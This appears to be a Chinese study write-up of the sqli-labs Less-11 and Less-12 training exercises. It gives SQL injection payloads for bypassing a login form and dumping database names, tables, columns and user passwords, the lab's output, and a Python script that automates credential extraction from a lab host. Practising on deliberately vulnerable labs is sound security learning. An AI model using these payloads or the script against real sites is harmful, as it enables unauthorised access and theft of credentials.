之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
基于错误的 sql 注入 #
函数讲解
group_concat()多条信息一次查询
distinct去重
Less-11 报错型sql注入-单引号
测试
在 username 中输入 admin’ or ‘1’=’1 #
在 password 中输入任意内容猜字段数
1 ’ order by 2# // 登录失败,无显示
1 ’ order by 3# // 登录失败,报错猜数据库名
1’union select 1,@@version#
1’union select 1,(select database() limit 0,1)#
1’union select 1,(select group_concat(distinct+table_schema,0x20) from information_schema.tables limit0,1)#结果为 information_schema ,challenges ,dvwa ,mysql ,owasp10 ,security ,tikiwiki ,tikiwiki195
猜表名
1’union select 1,(select group_concat(distinct+table_name,0x20) from information_schema.tables where table_schema=’security’) #
结果为 emails ,referers ,uagents ,users
猜列名
1’ union select 1,(select group_concat(distinct+column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’)#
结果为 id ,username ,password
猜数据
1’ union select 1,group_concat(distinct+username) from security.users #
1’ union select 1,group_concat(distinct+password) from security.users #结果为
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
运行脚本
#!/usr/bin/env python # -*- coding: utf-8 -*- import requests import hackhttp import re def verify(arg): print "verify start..." post = "uname=1%27%20union%20select%20md5(123),group_concat(password,0x20)%20from%20users%20 #&passwd=aaa&submit=Submit" # payload 必须使用 url 编码 hh = hackhttp.hackhttp() code, head, body, redirect_url, log = hh.http(arg,post) if '202cb962ac59075b964b07152d234b70' in body: print "目标存在sql注入!" def exploit(arg): print "exploit start..." payload = ['username','password'] username = "\nusername: " for i in payload: if i == 'password': username += '\npassowrd: ' post = "uname=1' union select 1,group_concat(distinct+{i}) from security.users #&passwd=aaa&submit=Submit".format(i=i) hh = hackhttp.hackhttp() code, head, body, redirect_url, log = hh.http(arg,post) user = re.findall("Your Password:(.*?)<br>",body) for c in user: username += c print "目标管理员用户: {username}".format(username=username) if __name__ == '__main__': verify('http://10.10.10.130/sqli-labs/Less-11/?id=') exploit('http://10.10.10.130/sqli-labs/Less-11/?id=')
Less-12 报错型sql注入-双引号
测试
在 username 中输入 admin”) or (“1”)=(“1 #
在 password 中输入任意内容猜字段数
1”) order by 2# // 登录失败,无显示
1”) order by 3# // 登录失败,报错猜数据库名
1”)union select 1,@@version#
1”)union select 1,database()#
1”)union select 1,(select group_concat(distinct+table_schema,0x20) from information_schema.tables)#结果为 information_schema ,challenges ,dvwa ,mysql ,owasp10 ,security ,tikiwiki ,tikiwiki195
猜表名
1”)union select 1,(select group_concat(distinct+table_name,0x20) from information_schema.tables where table_schema=’security’) #
结果为 emails ,referers ,uagents ,users
猜列名
1”) union select 1,(select group_concat(distinct+column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’)#
结果为 id ,username ,password
猜数据
1”) union select 1,group_concat(distinct+username) from security.users #
1”) union select 1,group_concat(distinct+password) from security.users #结果为
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4